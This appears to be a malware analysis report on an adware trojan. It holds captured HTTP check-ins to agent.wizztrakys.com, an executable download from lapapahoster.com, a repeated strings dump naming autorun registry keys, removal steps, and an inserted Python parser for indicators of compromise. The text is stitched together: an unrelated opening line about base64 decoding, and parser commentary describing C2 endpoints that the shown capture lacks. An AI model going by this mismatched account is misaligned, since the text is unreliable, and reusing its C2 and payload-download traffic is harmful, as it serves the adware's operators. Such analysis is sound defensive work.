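Restoring '+' before decoding matters: a space is not a base64 character, so a lenient decoder silently drops it and shifts every following sextet, which turns the rest of the XML into garbage rather than raising an error.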
POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 10:27:39 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=i0fqu3ni9fas4rf4svpbp2mo70; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

{"message":"Track was added"}
POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
HTTP/1.1 100 Continue
....
api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 10:27:39 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=4jkbd69eeilchgv5ph8rmakpn5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8

{"message":"Track was added"}
GET /safe_download/582369/AdsShow.exe HTTP/1.1
Host: lapapahoster.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 10:27:38 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

2200
MZ... [binary body: PE image, .NET assembly (BSJB metadata header, CLR v2.0.50727, #~ / #Strings / #US / #GUID / #Blob streams), sections .text, .rsrc, .reloc; dump truncated by the analysis system]
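Everything an analyst needs from the capture above sits in a handful of fields: the C2 check-in is a form-encoded POST to /api/v5/config whose JSON reply arrives labelled text/html, /api/v5/link returns the redirect URL, and every payload download announces its real filename in a content-disposition header. The parser below is an added example, not tooling from the report: it reads the dump layout used in this section (request line, headers, an interim HTTP/1.1 100 Continue, "...." standing for the blank line, then the request body and the final response) and extracts hosts, paths, POST parameters, JSON replies, attachment filenames, and any JSON reply that hides behind a non-JSON Content-Type. Its input is two exchanges copied from this section, with the binary body cut to its first chunk-size line.

```python
import json
import re
from typing import Any, Dict, List, Optional
from urllib.parse import parse_qs

# Two exchanges copied from the traffic section above, in the dump's own
# layout: request line, headers, an interim "HTTP/1.1 100 Continue", "...."
# where the dump renders the blank line, the request body, then the final
# response. The binary download body is cut to its first chunk-size line.
CAPTURE = """POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: wizzcaster.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
uid=57a764d042bf8&days_after_install=0
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 10:27:40 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Content-Length: 28
Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}
GET /download/3/wizzcaster_v2.exe HTTP/1.1
Host: lapapahoster.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 10:27:39 GMT
Server: Apache/2.4.10 (Debian)
content-disposition: attachment; filename="wizzcaster_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
fe000
MZ...
"""

REQUEST_RE = re.compile(r"^(GET|POST|HEAD|PUT|DELETE) (\S+) HTTP/1\.[01]$")
STATUS_RE = re.compile(r"^HTTP/1\.[01] (\d{3})\b")
HEADER_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*): ?(.*)$")
FILENAME_RE = re.compile(r'filename="?([^";]+)"?')


def parse_capture(text: str) -> List[dict]:
    """Split a sandbox-style HTTP dump into exchanges, one per request."""
    exchanges: List[dict] = []
    cur: Optional[dict] = None
    section = ""
    for raw in text.splitlines():
        line = raw.rstrip("\r")
        rm = REQUEST_RE.match(line)
        if rm:
            cur = {"method": rm.group(1), "path": rm.group(2), "req_headers": {},
                   "req_body": "", "status": None, "resp_headers": {}, "resp_body": ""}
            exchanges.append(cur)
            section = "req_hdr"
            continue
        if cur is None:
            continue
        sm = STATUS_RE.match(line)
        if sm:
            if sm.group(1) == "100":          # interim reply; the request body follows
                section = "req_body"
            else:
                cur["status"] = int(sm.group(1))
                section = "resp_hdr"
            continue
        if line == "....":                     # the dump's rendering of CRLF CRLF
            section = "req_body" if section.startswith("req") else "resp_body"
            continue
        hm = HEADER_RE.match(line)
        if section.endswith("hdr") and hm:
            cur[section.replace("hdr", "headers")][hm.group(1).lower()] = hm.group(2)
            continue
        section = section.replace("hdr", "body")   # first non-header line starts the body
        cur[section] += line + "\n"
    return exchanges


def extract_iocs(exchanges: List[dict]) -> Dict[str, Any]:
    """URLs, POST parameters, JSON replies, attachment filenames, and replies
    whose JSON body is served under a non-JSON Content-Type (as this C2 does)."""
    iocs: Dict[str, Any] = {"urls": [], "post_params": {}, "json": {},
                            "downloads": [], "mislabelled_json": []}
    for ex in exchanges:
        host = ex["req_headers"].get("host", "?")
        url = f"http://{host}{ex['path']}"
        iocs["urls"].append(url)
        if ex["method"] == "POST":
            qs = parse_qs(ex["req_body"].strip(), keep_blank_values=True)
            iocs["post_params"][url] = {k: v[0] for k, v in qs.items()}
        fm = FILENAME_RE.search(ex["resp_headers"].get("content-disposition", ""))
        if fm:
            iocs["downloads"].append((url, fm.group(1)))
        body = ex["resp_body"].strip()
        if body.startswith("{"):               # sniff the body; the header lies here
            try:
                iocs["json"][url] = json.loads(body)
            except json.JSONDecodeError:
                continue
            if "json" not in ex["resp_headers"].get("content-type", ""):
                iocs["mislabelled_json"].append(url)
    return iocs


if __name__ == "__main__":
    print(json.dumps(extract_iocs(parse_capture(CAPTURE)), indent=2))
```

The two decisions worth copying into real tooling are treating the 100 Continue line as a section marker rather than a response, and sniffing the body for JSON instead of trusting Content-Type: a rule that keys on application/json would miss this C2 entirely.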
The Trojan connects to the servers at the following location(s):
.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... ))
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!Microsoft.InternetExplorer.Default
-user32.dll
Kernel32.DLL
-xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421
iexplore.exe_1256:
.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... ))
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!Microsoft.InternetExplorer.Default
-user32.dll
Kernel32.DLL
-xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421
L37EQRQBZ.exe_3840_rwx_00302000_00009000:
.JhppJh
L37EQRQBZ.exe_3840_rwx_005B0000_0000F000:
o.jY[^_]
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
AfficheOne.exe:1472
Era5Le.exe:720
Like.exe:2336
%original file name%.exe:3380
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Roaming\0mpz3dha0z2\b5c1hnwf0gs.exe (208 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (868 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (868 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\0mpz3dha0z2\b5c1hnwf0gs.exe.config (1 bytes)
%Program Files%\8E1ZIRJA0X\cast.config (36 bytes)
%Program Files%\8E1ZIRJA0X\uninstaller.exe (25488 bytes)
%Program Files%\8E1ZIRJA0X\L37EQRQBZ.exe.config (1 bytes)
%Program Files%\8E1ZIRJA0X\uninstaller.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\AfficheOne.exe (400 bytes)
C:\config.conf (62 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\Like.exe (232527 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\Era5Le.exe (17276 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\AfficheOne.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\Like.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\Era5Le.exe.config (1 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"2niiqjaqkuj" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\0mpz3dha0z2\b5c1hnwf0gs.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"5K2HTR1KQOQBJKK" = "%Program Files%\8E1ZIRJA0X\L37EQRQBZ.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_8TSGI" = "C:\%original file name%.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.